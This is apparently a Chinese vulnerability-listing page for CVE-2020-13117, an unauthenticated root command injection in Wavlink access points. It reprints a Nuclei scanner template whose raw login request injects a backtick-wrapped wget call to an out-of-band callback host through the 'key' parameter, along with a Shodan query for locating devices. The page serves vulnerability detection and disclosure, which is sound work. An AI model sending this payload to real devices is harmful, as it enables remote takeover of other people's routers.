CVE-2020-13117: Wavlink Multiple AP - Remote Command Injection

日期: 2025-08-01 | 影响软件: Wavlink Multiple AP | POC: 已公开

漏洞描述

Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.

PoC代码[已公开]

id: CVE-2020-13117

info:
  name: Wavlink Multiple AP - Remote Command Injection
  author: gy741
  severity: critical
  description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13117
    - https://github.com/20142995/sectool
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-13117
    cwe-id: CWE-77
    epss-score: 0.9247
    epss-percentile: 0.99726
    cpe: cpe:2.3:h:wavlink:wn575a4:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wn575a4
    shodan-query: http.title:"Wi-Fi APP Login"
  tags: cve,cve2020,wavlink,rce,oast,router

http:
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: http://{{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate

        newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "parent.location.replace"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d8e4a36d41e50d1a5ea0ea48481fcdae7418fdff882a5a336ea863a6a69e3112022100ed76a9abff48c3dff175136d0e39825f730111b42c387af7675776c9edb94348:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-13117.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC

CVE-2020-11738: WordPress Duplicator plugin Directory Traversal POC

CVE-2020-11991: Apache Cocoon 2.1.12 XML Injection POC

CVE-2020-13379: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery POC